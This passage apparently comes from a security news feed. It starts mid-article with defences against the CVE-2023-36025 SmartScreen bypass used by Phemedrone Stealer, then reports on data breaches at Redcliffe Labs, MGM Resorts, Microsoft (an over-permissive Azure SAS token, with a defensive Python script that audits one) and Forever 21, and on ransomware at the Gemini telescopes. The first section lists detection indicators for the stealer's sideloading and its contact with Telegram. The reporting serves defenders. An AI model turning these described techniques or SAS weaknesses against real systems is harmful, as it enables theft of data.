Mitigating the risks associated with CVE-2023-36025 and similar vulnerabilities, especially in the context of the Phemedrone Stealer campaign, involves a multi-layered approach. Here are some key strategies:

  1. Apply Security Patches: Ensure that all systems have the latest Microsoft security updates installed, in particular the November 2023 update that fixes CVE-2023-36025, the Windows SmartScreen bypass triggered by crafted Internet Shortcut (.url) files. Keeping software current removes the known vulnerabilities that campaigns like this one rely on.
  2. Enhance Endpoint Protection: Utilize advanced endpoint protection solutions that can detect and block sophisticated malware like Phemedrone Stealer. These solutions should include behavior-based detection to identify malicious activities.
  3. Educate Users: Conduct security awareness training for all users. Educate them about the dangers of clicking on unknown links, opening suspicious email attachments, and the risks of downloading files from untrusted sources.
  4. Implement Network Security Measures: Use firewalls, intrusion detection systems, and intrusion prevention systems to monitor and control network traffic based on an applied set of security rules.
  5. Secure Email Gateways: Deploy email security solutions that can scan and filter out malicious emails, which are often the starting point for malware infections.
  6. Regular Backups: Regularly back up data and ensure that backup copies are stored securely. In case of a malware infection, having up-to-date backups can prevent data loss.
  7. Use Application Whitelisting: Control which applications are allowed to run on your endpoints, for example with AppLocker or Windows Defender Application Control. This blocks unauthorised executables, and DLL rules that refuse libraries loaded from user-writable directories also blunt the sideloading step used in this campaign.
  8. Monitor and Analyze Logs: Regularly review system and application logs for activity that matches the techniques described above: new scheduled tasks that launch a Windows binary from an unusual path, signed system executables such as WerFaultSecure.exe running from or loading DLLs out of user directories, downloads of executables from GitHub, and endpoints contacting api.telegram.org.
  9. Restrict User Privileges: Apply the principle of least privilege by limiting user access rights to only those necessary for their job functions. This can reduce the impact of a successful attack.
  10. Incident Response Plan: Have a well-defined incident response plan in place. This should include procedures for responding to a security breach and mitigating its impact.
  11. Use Secure Web Gateways: Deploy web gateways that can detect and block access to malicious websites, thereby preventing the download of harmful content.
  12. Regular Security Audits: Conduct regular security audits and vulnerability assessments to identify and address potential security gaps in the network.

By implementing these measures, organizations can significantly reduce their risk of falling victim to malware campaigns that exploit vulnerabilities like CVE-2023-36025.

The post How to exploit Windows Defender Antivirus to infect a device with malware appeared first on Information Security Newspaper | Hacking News.

Redcliffe Labs, India’s Medical Diagnostic Company leaks 7 TB of customer data. Will it pay 250 crore fine?
https://www.securitynewspaper.com/2023/10/25/redcliffe-labs-indias-medical-diagnostic-company-leaks-7-tb-of-customer-data-will-it-pay-250-crore-fine/
Thu, 26 Oct 2023 00:55:50 +0000 | https://www.securitynewspaper.com/?p=27308

Redcliffe Labs is one of the most comprehensive testing facilities in India. It provides more than 3,600 different diagnostic tests for illnesses and wellbeing. Users of its mobile application can receive diagnostic services at home, at medical facilities, or online, including in-home full-body examinations, blood testing, diabetes testing, joint care, vitamin testing, and specialised tests for cancer, genetics, HIV, pregnancy, and a wide variety of other conditions. Redcliffe Labs also advertises free sample collection and a consultation with a medical professional, and its website states that it has 2.5 million clients. Cybersecurity researcher Jeremiah Fowler discovered, and reported through WebsitePlanet, a database that was not protected by a password and contained over 12 million records, including medical diagnostic scans, test results, and other potentially sensitive medical information.


The database held an enormous quantity of medical test results, including the names of patients and physicians and other sensitive health information such as where the sample was taken (at home or at a medical institution), among many other details. In total there were 12,347,297 records with a combined size of 7 terabytes (TB). Further research showed that the documents carried a watermark identifying them as belonging to Redcliffe Labs, a company based in India. I did not waste any time in sending a responsible disclosure notification, and I was promptly rewarded with a response that acknowledged my finding and thanked me for my efforts. It is unknown how long the information was publicly accessible or whether any unauthorised person viewed the health records before public access was restricted, which happened the same day. The database also included a folder labelled “test results” holding more than six million PDF documents, which suggests either that far more customers were affected than the stated 2.5 million or that the same customers had repeated tests.

The Digital Personal Data Protection Act, 2023 (DPDP Act) is a broad new privacy law passed in India in August 2023. It is India’s first comprehensive data protection legislation; it addresses a wide range of data-related concerns and applies to any business that operates in India or whose customers are located there.

Companies that have experienced a data breach are required under the DPDP Act to notify the relevant authorities as well as the people whose personal information was compromised within the first 72 hours after the breach has been identified and validated. In addition, the DPDP Act includes a provision that levies monetary fines on businesses that do not adhere to the newly implemented standards. The fines may vary anywhere from INR 10,000 (about equivalent to USD 120) to INR 250 crore (roughly equivalent to USD 30.2 million).

As of the time this article was published, it is unknown whether Redcliffe Labs has informed the appropriate authorities or the people potentially affected by the exposure. The database held 12,347,297 entries with a total size of seven terabytes, broken down as follows:

  1. “Reports”: 1,180,000 objects, 620.5 gigabytes. These were also test results, in their most basic form, with no header logo.
  2. Intelligent Report Archiving: 1,164,000 objects, 1.5 terabytes. Test findings presented in an infographic format.
  3. “Test results”: 6,090,852 objects, 2.2 terabytes.
  4. Various other folders, none of them password protected: 3,912,445 objects, 2.7 terabytes (the figure that brings the folders up to the stated 7 TB total). These held PDF files, internal company documents, logging data, mobile application development files, and other file types.

The database not only housed millions of medical records but also the development files for the company’s mobile application. Leaving application files open to the public is a serious risk should they fall into the wrong hands: such files can govern how the application behaves and what data it sends from the user to the host server, and a malicious actor could use them to mount a variety of attacks against users’ data, the application’s operation, or the security of the mobile device itself.

The alteration or change of the application’s source code files is one of the most significant potential threats. The files might be altered in such a way as to incorporate a malicious code execution, which would make it possible for hackers to undermine the app’s integrity and security, inject malware, or add additional features without authorization. As soon as the code has been altered, malicious actors have the opportunity to steal or get access to a patient’s confidential data, which may include the results of tests, scans, or other sensitive information. If hackers were to obtain access to a user’s health and medical testing information, this might lead to major abuses of the user’s privacy. In addition, accessible code or resource files might theoretically be used in reverse engineering, analysis, or decompilation of the application in order to get insight into how the programme operates. It’s possible that this may lead to the discovery of new vulnerabilities and weaknesses that can be used in the future for malicious purposes.

The post Redcliffe Labs, India’s Medical Diagnostic Company leaks 7 TB of customer data. Will it pay 250 crore fine? appeared first on Information Security Newspaper | Hacking News.

How MGM Resorts lost $100 million as a result of a simple vishing call
https://www.securitynewspaper.com/2023/10/06/how-mgm-resorts-lost-100-million-as-a-result-of-a-simple-vishing-call/
Fri, 06 Oct 2023 17:19:35 +0000 | https://www.securitynewspaper.com/?p=27279

Cyberattack on MGM Resorts: A Financial Debacle

MGM Resorts encountered a devastating cyberattack recently, incurring an approximate financial setback of $100 million. Unveiled on September 11, this digital attack led to the temporary shutdown of multiple systems within MGM’s various properties, disrupting operations and inflicting significant monetary losses.

Details of the Attack

The digital onslaught on MGM Resorts wasn’t confined to a single property but spread across its flagship resort and other prestigious properties like Mandalay Bay, Bellagio, The Cosmopolitan, and Aria. The cybercriminals managed to disrupt a range of operations, from the functioning of slot machines and the systems overseeing restaurant management to the technology behind room key cards. Despite the containment efforts by MGM, the attackers successfully exfiltrated a diverse set of customer data, including but not limited to names, addresses, phone numbers, driver’s license numbers, Social Security numbers, and passport details. Fortunately, credit card details remained secure and unaffected.

Economic Fallout

The cyber intrusion had a profound economic impact on MGM Resorts, with losses estimated around $100 million. This financial blow is anticipated to ripple through the earnings of the third and fourth fiscal quarters. However, MGM remains optimistic, projecting a 93% occupancy rate in October and planning for a complete operational recovery in Las Vegas by November. Expenses related to the cyberattack, including consultancy fees, legal services, and other related costs, amounted to less than $10 million.

Compromise of Customer Data

A vast array of customer data, from Social Security numbers to passport details, was pilfered during the cyber attack. The total count of individuals affected by this breach remains uncertain as MGM has not issued any comments on this matter. Proactive measures have been initiated by MGM Resorts to assist the victims of this data breach, including the establishment of dedicated phone lines and informational websites. The company also intends to reach out to the affected individuals via email, extending offers for identity protection services.

Identity of the Attackers

The attack was initially attributed to hackers affiliated with the group known as Scattered Spider, which works with the Russian-speaking ransomware operation ALPHV/BlackCat; the latter publicly claimed the MGM intrusion. Scattered Spider has a notorious track record, having been implicated in several major attacks over the past year against entities such as Reddit, Riot Games, Coinbase, and another major casino operator, Caesars Entertainment.

Recovery and Response

In response to the cyberattack, MGM Resorts took immediate action by shutting down all its systems to thwart further unauthorized access to customer data. Since these initial countermeasures, the company’s domestic properties have seen a return to normalcy in operations, with the majority of systems that interact with guests being restored. Efforts are ongoing to bring the remaining affected systems back online, with full restoration anticipated in the near future.

Conclusion and Future Implications

The cyberattack experienced by MGM Resorts highlights the substantial risks and potential financial damages associated with digital security breaches in the hospitality sector. With the compromise of sensitive customer information and the incurrence of hefty financial losses, this incident serves as a stark reminder for all businesses in the industry to bolster their cybersecurity infrastructure to safeguard against future digital threats. The episode underscores the imperative for continuous investments in state-of-the-art cybersecurity mechanisms and protocols to preemptively mitigate the risks of future cyber-attacks and protect sensitive customer data.

The post How MGM Resorts lost $100 million as a result of a simple vishing call appeared first on Information Security Newspaper | Hacking News.

Microsoft AI team leaks 38 GB of confidential data, including employees disk backup
https://www.securitynewspaper.com/2023/09/18/microsoft-ai-team-leaks-38-gb-of-confidential-data-including-employees-disk-backup/
Mon, 18 Sep 2023 20:17:27 +0000 | https://www.securitynewspaper.com/?p=27226

Microsoft’s artificial intelligence (AI) research division suffered a serious data exposure: a misconfigured Azure storage account exposed 38 terabytes of confidential internal Microsoft data, as discovered by the cloud security company Wiz.
The exposure arose when Microsoft researchers published open-source AI training data on GitHub. The repository pointed users to an Azure storage URL from which to download the data, but the access token embedded in that URL carried far broader permissions than needed: it granted read and write access to the entire storage account rather than just the intended dataset.

Wiz found that this account held 38 terabytes of confidential Microsoft data, including:

  1. Backups of employees’ workstations, which may contain passwords, secret keys, and internal Microsoft Teams messages.
  2. Over 30,000 internal Microsoft Teams messages from 359 Microsoft employees.

The underlying problem was an Azure Shared Access Signature (SAS) token whose permissions had not been scoped properly. SAS tokens allow fine-grained control over access to Azure storage accounts, but when configured incorrectly they grant far more than intended. As the Wiz team describes it, a SAS token is a signed URL that grants access to Azure Storage data: the issuer chooses the access level, from read-only to full control, and the scope, which can be a single file, a container, or the entire storage account.

Additionally, the user has total control over the expiration time, giving them the ability to generate access tokens that never expire.

In this instance, instead of granting read-only access to the intended files, the token granted full control over the contents of the whole account, and it had no expiry date, so access would have remained valid indefinitely. The Wiz Research Team summarised the risk as follows: because SAS tokens lack monitoring and governance, they pose a real threat to data security and their use should be restricted as far as possible; Azure offers no centralised way to manage them in the portal, so keeping track of issued tokens is very hard; their lifetime can be set to practically never expire and there is no enforced maximum age; and consequently Account SAS tokens are not a safe mechanism for external sharing and should not be used for it.

Because there is a lack of control, Wiz suggests putting restrictions on how account-level SAS tokens may be used. In addition, separate storage accounts should be used for any and all reasons involving external sharing. It is also recommended to do appropriate monitoring as well as security evaluations of shared data.
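An added Python check (not Wiz’s or Microsoft’s code) that audits a SAS URL for the three properties that made the leaked token dangerous: account-level scope, permissions beyond read, and a missing or far-future expiry. It parses the documented SAS query parameters (sv, ss, srt, sp, se, sr, sig) with the standard library only; the sample URL, storage account name and signature are constructed, and the seven-day acceptable lifetime is an assumed policy value.

```python
"""Audit an Azure Storage SAS URL for over-broad scope, permissions and lifetime.

Added example, not Wiz's or Microsoft's code. The URL, account name and
signature are constructed; `max_days` is an assumed sharing policy.
"""
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed account-level SAS: all services, all resource types, every
# permission, expiry decades out. Nothing here is a real account or signature.
CONSTRUCTED_SAS_URL = (
    "https://examplestorage.blob.core.windows.net/?sv=2021-06-08&ss=bfqt"
    "&srt=sco&sp=rwdlacupx&se=2051-10-06T00:00:00Z&spr=https&sig=FAKESIG%3D"
)

PERMISSION_NAMES = {
    "r": "read", "w": "write", "d": "delete", "l": "list", "a": "add",
    "c": "create", "u": "update", "p": "process", "x": "delete-version",
    "y": "permanent-delete", "t": "tag", "f": "filter", "i": "set-immutability",
}
RESOURCE_TYPES = {"s": "service", "c": "container", "o": "object"}
SERVICES = {"b": "blob", "f": "file", "q": "queue", "t": "table"}
NON_READ = {"write", "delete", "list", "add", "create", "update",
            "delete-version", "permanent-delete"}


def parse_sas(url):
    """Return the SAS query parameters as a flat dict (first value per key)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in qs.items()}


def audit_sas(url, now=None, max_days=7):
    """Return a list of human-readable findings for the SAS URL.

    `max_days` is the longest lifetime treated as acceptable for external
    sharing (assumed policy). An empty list means nothing risky was seen.
    """
    now = now or datetime.now(timezone.utc)
    p = parse_sas(url)
    if "sig" not in p or "sv" not in p:
        return ["not a SAS URL (missing sig/sv)"]

    findings = []
    # Account SAS carries ss/srt; a service SAS carries sr and is bounded to
    # one blob, container or directory.
    if "ss" in p or "srt" in p:
        services = [SERVICES.get(c, c) for c in p.get("ss", "")]
        rtypes = [RESOURCE_TYPES.get(c, c) for c in p.get("srt", "")]
        findings.append(f"account SAS: services={services} resource_types={rtypes}")
        if "s" in p.get("srt", ""):
            findings.append("service-level scope: token can enumerate containers")
    elif "sr" in p:
        findings.append(f"service SAS scoped to resource type '{p['sr']}'")

    perms = {PERMISSION_NAMES.get(c, c) for c in p.get("sp", "")}
    risky = sorted(NON_READ & perms)
    if risky:
        findings.append(f"non-read permissions granted: {risky}")

    # se is mandatory for an ad hoc SAS; it may be absent when a stored
    # access policy (si) supplies the expiry, or supplies none at all.
    if "se" not in p:
        findings.append("no expiry (se) on the token itself: check the stored access policy")
    else:
        expiry = datetime.fromisoformat(p["se"].replace("Z", "+00:00"))
        if expiry - now > timedelta(days=max_days):
            findings.append(f"expiry {p['se']} is more than {max_days} days out")
    return findings


if __name__ == "__main__":
    for line in audit_sas(CONSTRUCTED_SAS_URL):
        print("-", line)
```

Run it over every SAS URL found in repositories, wikis and chat exports; a token that produces the first two findings is exactly the shape Wiz describes, and the fix is a service SAS on a dedicated sharing account with read-only permission and a short expiry.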

Microsoft has since invalidated the exposed SAS token and carried out an internal assessment of the potential impact; the company also acknowledged the incident in a recent blog post.

Because more of an organization’s engineers are now working with enormous volumes of training data, this story illustrates the additional dangers that businesses face when beginning to utilize the capability of artificial intelligence more generally. The enormous volumes of data that data scientists and engineers work with need extra security checks and precautions as they work to get innovative AI solutions into production as quickly as possible.

The post Microsoft AI team leaks 38 GB of confidential data, including employees disk backup appeared first on Information Security Newspaper | Hacking News.

Two world’s biggest telescopes hacked by Ransomware attack
https://www.securitynewspaper.com/2023/09/04/two-worlds-biggest-telescopes-hacked-by-ransomware-attack/
Tue, 05 Sep 2023 00:30:25 +0000 | https://www.securitynewspaper.com/?p=27199

Several telescopes are still down weeks after a cybersecurity attack was discovered by US National Science Foundation (NSF) researchers. There is presently no information available on when the Gemini North telescope in Hawaii and the Gemini South telescope in Chile will resume operations. A number of smaller telescopes on the slopes of Cerro Tololo in Chile were also shut down “out of an abundance of caution”.

The IT team at the National Science Foundation’s NOIRLab discovered suspicious behavior in the laboratory’s computer systems early on the morning of August 1. This led to the decision to temporarily halt activities at the huge optical infrared telescopes located on Hawaii’s Maunakea for the sake of safety.

The ‘double’ telescope located in the southern Andes of Chile was already in the process of being prepped for maintenance and required very little more work.

Even while it is unclear what kind of threat, if any, the telescopes themselves would have been exposed to, this threat serves as a reminder that doing scientific research is an expensive endeavor, with astronomical research facilities needing yearly budgets that can easily reach into the millions of dollars.

There is a cost incurred by the scientific community for each day that passes with the facilities being unavailable to researchers. Not just monetarily, but also in terms of the data that was lost.

Because astronomical studies sometimes need activities to be precisely scheduled, disturbances like this have the ability to completely derail whole research efforts if a sufficient number of important observation windows are missed.

Even though this is one of the first ransomware intrusions on a scientific research institution, hacks against astronomical facilities aren’t exactly unheard of.

Hackers gained access to the Atacama Large Millimeter Array Observatory in Chile through a virtual private network in October 2022, which resulted in the facility being forced to shut down for many months at a cost of around US$250,000 per day.

It is assumed that the purpose of the “particularly sophisticated” hack had been to extract money from the observatory’s consortium of operators. This is consistent with the suspicion that the intrusion was a ransomware attempt.

In its most recent statement, the lab said that it was “continuing its efforts to diligently investigate and resolve the cybersecurity incident that occurred on its computer systems on August 1st.”

Many useful resources, such as the Gemini.edu website, were unavailable to scientists and amateurs as a result of the incident.

“Our team is collaborating with cybersecurity specialists to quickly restore internet access to all affected telescopes and our website, and we are pleased with the results thus far. We are unhappy that several of our telescopes are not now watching, as is the whole astronomical community,” according to NOIRLab.

Since the notional launch date was set for August 31, the Lab was compelled to postpone a Gemini Call for Proposals for the Semester beginning on February 1 of the following year.

“We continue to make data available via our website because we think that open access and information sharing are essential for good scientific cooperation. We are constrained in what we can reveal about our cybersecurity measures and investigative results since our investigation into this issue is continuing,” the Lab states.

Several years earlier, an unauthorised Raspberry Pi connected to computers at NASA’s Jet Propulsion Laboratory enabled unlawful access to the Deep Space Network. As a result, the Johnson Space Center withdrew its own mission systems from the gateway entirely.

More money will be required to safeguard the information technology at the heart of the scientific infrastructure for studying the universe as projects grow in scope, complexity and size, and as attacks become more sophisticated.

The post Two world’s biggest telescopes hacked by Ransomware attack appeared first on Information Security Newspaper | Hacking News.

Forever 21, fashion company hacked, customer personal data leaked
https://www.securitynewspaper.com/2023/08/31/forever-21-fashion-company-hacked-customer-personal-data-leaked/
Thu, 31 Aug 2023 22:31:15 +0000 | https://www.securitynewspaper.com/?p=27195

After the American fashion retailer announced that it had experienced a data breach affecting some of its locations, Forever 21 is advising consumers to keep a careful eye on their credit card bills.

Forever 21 disclosed, in a short statement that was published on the company’s website, that it had obtained information from a third party indicating that the company’s security may have been breached. There are around 500 physical sites of Forever 21, in addition to an online shop. After a large-scale theft of credit card details from its shop point-of-sale equipment in 2017, this is the second data breach that has occurred in recent years for the company.

After further examination, it was discovered that despite the fact that the firm had implemented encryption and enhanced security measures in 2015 in response to a string of attacks against other shops, “certain point of sale devices in some Forever 21 stores were affected” because encryption “was not in operation.”

According to the firm, it is still collecting evidence, and it is too soon to release further details, including which specific locations may have been compromised and the periods during which consumers may have been at risk. In 2008, the United States Department of Justice brought charges against a group of individuals responsible for stealing the credit card details of hundreds of millions of customers from large retailers including TJ Maxx, Barnes & Noble, Boston Market, and Forever 21.

Forever 21 alerted 539,207 persons, according to the notification, that the data breach included their name, date of birth, bank account number, and Social Security number, as well as information about workers’ Forever21 health plan, including enrollment and premiums paid.

Forever 21 did not provide any further details on the issue beyond the fact that one of its computer systems had been compromised, but the company did say that “Forever 21 has taken steps to help assure that the unauthorized third party no longer has access to the data.” It is not quite obvious how Forever 21 came to declare that they have assurance. Because of the notice’s unclear phrasing, it is possible to infer that the corporation paid the hacker in return for the data being deleted.

The post Forever 21, fashion company hacked, customer personal data leaked appeared first on Information Security Newspaper | Hacking News.
